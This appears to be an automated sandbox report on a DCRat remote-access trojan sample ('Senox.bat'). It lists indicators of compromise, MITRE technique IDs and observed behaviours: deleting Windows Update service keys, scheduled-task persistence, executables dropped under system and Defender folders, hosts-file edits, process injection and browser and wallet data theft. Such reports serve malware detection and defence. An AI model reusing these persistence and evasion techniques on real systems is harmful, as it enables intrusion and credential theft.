dcrat | 0bb89898ef01a14ca19b062f0bbcaee1be2bfcb113e65bb32b84108bd1009d9f

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
05-09-2022 17:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Senox.bat
Size

24KB
MD5

5c127a3116ab79ccc8cc74a33a3b4e30
SHA1

d8d30bc6689dc8eab0e1410eaa7320483537e2c2
SHA256

0bb89898ef01a14ca19b062f0bbcaee1be2bfcb113e65bb32b84108bd1009d9f
SHA512

7090111935c4302c87633442ba4616ac35c80fca5a3ae7cf25d8d46b29422a5a931e07b2b66ef03a0b368e9b480a54cb4b7c1b229c25cac775281d22aaaefe2d
SSDEEP

384:gM09FmyhR3aY6AggTTgMPZXffUzyJpt8RL+3GSKwl5KYABdM:g91EAgkPZXffUOJ0Ry3GSfYYABdM

Score

10^/10

dcrat discovery evasion exploit infostealer rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

Process spawned unexpected child process 24 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1436	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	724	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4120	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1368	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2732	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3748	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4552	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3476	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1816	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4364	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1112	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1944	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2352	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4960	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3708	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4900	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4904	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1192	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	716	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2328	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2612	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2344	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2448	4036	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2272	4036	schtasks.exe

DCRat payload 8 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Protector.exe	dcrat
C:\Users\Admin\AppData\Local\Temp\Protector.exe	dcrat
C:\comsavesbroker\containersavesdhcp.exe	dcrat
C:\comsavesbroker\containersavesdhcp.exe	dcrat
behavioral2/memory/3852-173-0x0000000000CF0000-0x0000000000FA2000-memory.dmp	dcrat
C:\Program Files (x86)\Windows Defender\es-ES\SppExtComObj.exe	dcrat
C:\Program Files (x86)\Windows Defender\es-ES\SppExtComObj.exe	dcrat
behavioral2/memory/2792-279-0x0000000000FC0000-0x0000000001272000-memory.dmp	dcrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

15 1332 powershell.exe
Downloads MZ/PE file

flow	pid	process
15	1332	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

AntiDebug.exeupdaterchr.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	AntiDebug.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updaterchr.exe

Executes dropped EXE 7 IoCs

Processes:

Senox.bat.exeProtector.exeAntiDebug.execontainersavesdhcp.exeupdaterchr.exeSppExtComObj.exeexplorer.exe

pid process

3976 Senox.bat.exe
2220 Protector.exe
3556 AntiDebug.exe
3852 containersavesdhcp.exe
4188 updaterchr.exe
2792 SppExtComObj.exe
3232 explorer.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

3888 takeown.exe
4664 icacls.exe
2348 takeown.exe
3172 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
3888	takeown.exe
4664	icacls.exe
2348	takeown.exe
3172	icacls.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Senox.bat.exeAntiDebug.exeProtector.exeWScript.execontainersavesdhcp.exeSppExtComObj.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	Senox.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	AntiDebug.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	Protector.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	containersavesdhcp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

3888 takeown.exe
4664 icacls.exe
2348 takeown.exe
3172 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

44 ipinfo.io
43 ipinfo.io

pid	process
3888	takeown.exe
4664	icacls.exe
2348	takeown.exe
3172	icacls.exe

flow	ioc
44	ipinfo.io
43	ipinfo.io

Drops file in System32 directory 10 IoCs

Processes:

powershell.exepowershell.execontainersavesdhcp.exeupdaterchr.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\fr\RCX99D2.tmp	containersavesdhcp.exe
File created	C:\Windows\SysWOW64\fr\5940a34987c991	containersavesdhcp.exe
File opened for modification	C:\Windows\SysWOW64\fr\dllhost.exe	containersavesdhcp.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\F603.tmp	updaterchr.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updaterchr.exe.log	updaterchr.exe
File created	C:\Windows\SysWOW64\fr\dllhost.exe	containersavesdhcp.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

updaterchr.exe

description pid process target process

PID 4188 set thread context of 3232 4188 updaterchr.exe explorer.exe

description	pid	process	target process
PID 4188 set thread context of 3232	4188	updaterchr.exe	explorer.exe

Drops file in Program Files directory 15 IoCs

Processes:

containersavesdhcp.exeAntiDebug.exeupdaterchr.exe

description	ioc	process
File created	C:\Program Files\Reference Assemblies\dwm.exe	containersavesdhcp.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\RuntimeBroker.exe	containersavesdhcp.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\RCX9F14.tmp	containersavesdhcp.exe
File created	C:\Program Files\Reference Assemblies\6cb0b6c459d5d3	containersavesdhcp.exe
File created	C:\Program Files (x86)\Windows Mail\RuntimeBroker.exe	containersavesdhcp.exe
File created	C:\Program Files (x86)\Windows Defender\es-ES\e1ef82546f0b02	containersavesdhcp.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\RCX9721.tmp	containersavesdhcp.exe
File created	C:\Program Files (x86)\Windows Mail\9e8d7a4ca61bd9	containersavesdhcp.exe
File opened for modification	C:\Program Files\Reference Assemblies\RCX9490.tmp	containersavesdhcp.exe
File opened for modification	C:\Program Files\Google\Chrome\updaterchr.exe	AntiDebug.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\SppExtComObj.exe	containersavesdhcp.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updaterchr.exe
File opened for modification	C:\Program Files\Reference Assemblies\dwm.exe	containersavesdhcp.exe
File created	C:\Program Files (x86)\Windows Defender\es-ES\SppExtComObj.exe	containersavesdhcp.exe
File created	C:\Program Files\Google\Chrome\updaterchr.exe	AntiDebug.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1128 sc.exe
3140 sc.exe
3372 sc.exe
1904 sc.exe
5004 sc.exe
1368 sc.exe
476 sc.exe
3772 sc.exe
4860 sc.exe
4124 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1128	sc.exe
3140	sc.exe
3372	sc.exe
1904	sc.exe
5004	sc.exe
1368	sc.exe
476	sc.exe
3772	sc.exe
4860	sc.exe
4124	sc.exe

Creates scheduled task(s) 1 TTPs 24 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
1944	schtasks.exe
2352	schtasks.exe
2612	schtasks.exe
2344	schtasks.exe
1436	schtasks.exe
3476	schtasks.exe
4364	schtasks.exe
3708	schtasks.exe
4904	schtasks.exe
2448	schtasks.exe
2272	schtasks.exe
4120	schtasks.exe
4552	schtasks.exe
1112	schtasks.exe
4960	schtasks.exe
1192	schtasks.exe
724	schtasks.exe
2732	schtasks.exe
1816	schtasks.exe
716	schtasks.exe
2328	schtasks.exe
1368	schtasks.exe
3748	schtasks.exe
4900	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exeupdaterchr.exeexplorer.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	updaterchr.exe

Modifies registry class 3 IoCs

Processes:

Protector.execontainersavesdhcp.exeSppExtComObj.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	Protector.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	containersavesdhcp.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	SppExtComObj.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
32	reg.exe
2032	reg.exe
3748	reg.exe
3052	reg.exe
1420	reg.exe
3840	reg.exe
2004	reg.exe
3100	reg.exe
1684	reg.exe
1512	reg.exe
4948	reg.exe
1012	reg.exe
2348	reg.exe
4764	reg.exe
1504	reg.exe
1460	reg.exe
1964	reg.exe
1008	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Senox.bat.exepowershell.exepowershell.exepowershell.execontainersavesdhcp.exepowershell.exeAntiDebug.exepowershell.exepowershell.exeDllHost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeSppExtComObj.exe

pid	process
3976	Senox.bat.exe
3976	Senox.bat.exe
1332	powershell.exe
1332	powershell.exe
2828	powershell.exe
2828	powershell.exe
1504	powershell.exe
1504	powershell.exe
3852	containersavesdhcp.exe
3852	containersavesdhcp.exe
3852	containersavesdhcp.exe
1856	powershell.exe
1856	powershell.exe
3556	AntiDebug.exe
220	powershell.exe
220	powershell.exe
532	powershell.exe
4120	DllHost.exe
4120	DllHost.exe
2988	powershell.exe
2988	powershell.exe
4312	powershell.exe
4312	powershell.exe
1112	powershell.exe
1112	powershell.exe
4904	powershell.exe
4904	powershell.exe
3768	powershell.exe
3768	powershell.exe
2312	powershell.exe
2312	powershell.exe
3564	powershell.exe
3564	powershell.exe
4564	powershell.exe
4564	powershell.exe
3736	powershell.exe
3736	powershell.exe
752	powershell.exe
752	powershell.exe
532	powershell.exe
532	powershell.exe
1316	powershell.exe
1316	powershell.exe
4120	DllHost.exe
4120	DllHost.exe
2988	powershell.exe
2988	powershell.exe
4312	powershell.exe
4312	powershell.exe
1112	powershell.exe
4904	powershell.exe
3768	powershell.exe
2312	powershell.exe
4564	powershell.exe
3564	powershell.exe
3736	powershell.exe
752	powershell.exe
1316	powershell.exe
2792	SppExtComObj.exe
2792	SppExtComObj.exe
2792	SppExtComObj.exe
2792	SppExtComObj.exe
2792	SppExtComObj.exe
2792	SppExtComObj.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

SppExtComObj.exe

pid process

2792 SppExtComObj.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

652

pid	process
2792	SppExtComObj.exe

pid	process
652

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Senox.bat.exepowershell.exepowershell.exepowershell.execontainersavesdhcp.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	3976	Senox.bat.exe
Token: SeDebugPrivilege	1332	powershell.exe
Token: SeDebugPrivilege	2828	powershell.exe
Token: SeDebugPrivilege	1504	powershell.exe
Token: SeDebugPrivilege	3852	containersavesdhcp.exe
Token: SeShutdownPrivilege	4420	powercfg.exe
Token: SeCreatePagefilePrivilege	4420	powercfg.exe
Token: SeShutdownPrivilege	4412	powercfg.exe
Token: SeCreatePagefilePrivilege	4412	powercfg.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeShutdownPrivilege	3728	powercfg.exe
Token: SeCreatePagefilePrivilege	3728	powercfg.exe
Token: SeShutdownPrivilege	4864	powercfg.exe
Token: SeCreatePagefilePrivilege	4864	powercfg.exe
Token: SeTakeOwnershipPrivilege	3888	takeown.exe
Token: SeIncreaseQuotaPrivilege	1856	powershell.exe
Token: SeSecurityPrivilege	1856	powershell.exe
Token: SeTakeOwnershipPrivilege	1856	powershell.exe
Token: SeLoadDriverPrivilege	1856	powershell.exe
Token: SeSystemProfilePrivilege	1856	powershell.exe
Token: SeSystemtimePrivilege	1856	powershell.exe
Token: SeProfSingleProcessPrivilege	1856	powershell.exe
Token: SeIncBasePriorityPrivilege	1856	powershell.exe
Token: SeCreatePagefilePrivilege	1856	powershell.exe
Token: SeBackupPrivilege	1856	powershell.exe
Token: SeRestorePrivilege	1856	powershell.exe
Token: SeShutdownPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeSystemEnvironmentPrivilege	1856	powershell.exe
Token: SeRemoteShutdownPrivilege	1856	powershell.exe
Token: SeUndockPrivilege	1856	powershell.exe
Token: SeManageVolumePrivilege	1856	powershell.exe
Token: 33	1856	powershell.exe
Token: 34	1856	powershell.exe
Token: 35	1856	powershell.exe
Token: 36	1856	powershell.exe
Token: SeIncreaseQuotaPrivilege	1856	powershell.exe
Token: SeSecurityPrivilege	1856	powershell.exe
Token: SeTakeOwnershipPrivilege	1856	powershell.exe
Token: SeLoadDriverPrivilege	1856	powershell.exe
Token: SeSystemProfilePrivilege	1856	powershell.exe
Token: SeSystemtimePrivilege	1856	powershell.exe
Token: SeProfSingleProcessPrivilege	1856	powershell.exe
Token: SeIncBasePriorityPrivilege	1856	powershell.exe
Token: SeCreatePagefilePrivilege	1856	powershell.exe
Token: SeBackupPrivilege	1856	powershell.exe
Token: SeRestorePrivilege	1856	powershell.exe
Token: SeShutdownPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeSystemEnvironmentPrivilege	1856	powershell.exe
Token: SeRemoteShutdownPrivilege	1856	powershell.exe
Token: SeUndockPrivilege	1856	powershell.exe
Token: SeManageVolumePrivilege	1856	powershell.exe
Token: 33	1856	powershell.exe
Token: 34	1856	powershell.exe
Token: 35	1856	powershell.exe
Token: 36	1856	powershell.exe
Token: SeIncreaseQuotaPrivilege	1856	powershell.exe
Token: SeSecurityPrivilege	1856	powershell.exe
Token: SeTakeOwnershipPrivilege	1856	powershell.exe
Token: SeLoadDriverPrivilege	1856	powershell.exe
Token: SeSystemProfilePrivilege	1856	powershell.exe
Token: SeSystemtimePrivilege	1856	powershell.exe
Token: SeProfSingleProcessPrivilege	1856	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

SppExtComObj.exe

pid process

2792 SppExtComObj.exe

pid	process
2792	SppExtComObj.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exeSenox.bat.execmd.exepowershell.exeAntiDebug.exeProtector.exeWScript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2732 wrote to memory of 344	2732	cmd.exe	net.exe
PID 2732 wrote to memory of 344	2732	cmd.exe	net.exe
PID 344 wrote to memory of 228	344	net.exe	net1.exe
PID 344 wrote to memory of 228	344	net.exe	net1.exe
PID 2732 wrote to memory of 3976	2732	cmd.exe	Senox.bat.exe
PID 2732 wrote to memory of 3976	2732	cmd.exe	Senox.bat.exe
PID 3976 wrote to memory of 1332	3976	Senox.bat.exe	powershell.exe
PID 3976 wrote to memory of 1332	3976	Senox.bat.exe	powershell.exe
PID 3976 wrote to memory of 3956	3976	Senox.bat.exe	cmd.exe
PID 3976 wrote to memory of 3956	3976	Senox.bat.exe	cmd.exe
PID 3956 wrote to memory of 4552	3956	cmd.exe	choice.exe
PID 3956 wrote to memory of 4552	3956	cmd.exe	choice.exe
PID 3956 wrote to memory of 2968	3956	cmd.exe	attrib.exe
PID 3956 wrote to memory of 2968	3956	cmd.exe	attrib.exe
PID 1332 wrote to memory of 2828	1332	powershell.exe	powershell.exe
PID 1332 wrote to memory of 2828	1332	powershell.exe	powershell.exe
PID 1332 wrote to memory of 2220	1332	powershell.exe	Protector.exe
PID 1332 wrote to memory of 2220	1332	powershell.exe	Protector.exe
PID 1332 wrote to memory of 2220	1332	powershell.exe	Protector.exe
PID 1332 wrote to memory of 3556	1332	powershell.exe	AntiDebug.exe
PID 1332 wrote to memory of 3556	1332	powershell.exe	AntiDebug.exe
PID 3556 wrote to memory of 1504	3556	AntiDebug.exe	powershell.exe
PID 3556 wrote to memory of 1504	3556	AntiDebug.exe	powershell.exe
PID 2220 wrote to memory of 2076	2220	Protector.exe	WScript.exe
PID 2220 wrote to memory of 2076	2220	Protector.exe	WScript.exe
PID 2220 wrote to memory of 2076	2220	Protector.exe	WScript.exe
PID 2076 wrote to memory of 2864	2076	WScript.exe	cmd.exe
PID 2076 wrote to memory of 2864	2076	WScript.exe	cmd.exe
PID 2076 wrote to memory of 2864	2076	WScript.exe	cmd.exe
PID 2864 wrote to memory of 3852	2864	cmd.exe	containersavesdhcp.exe
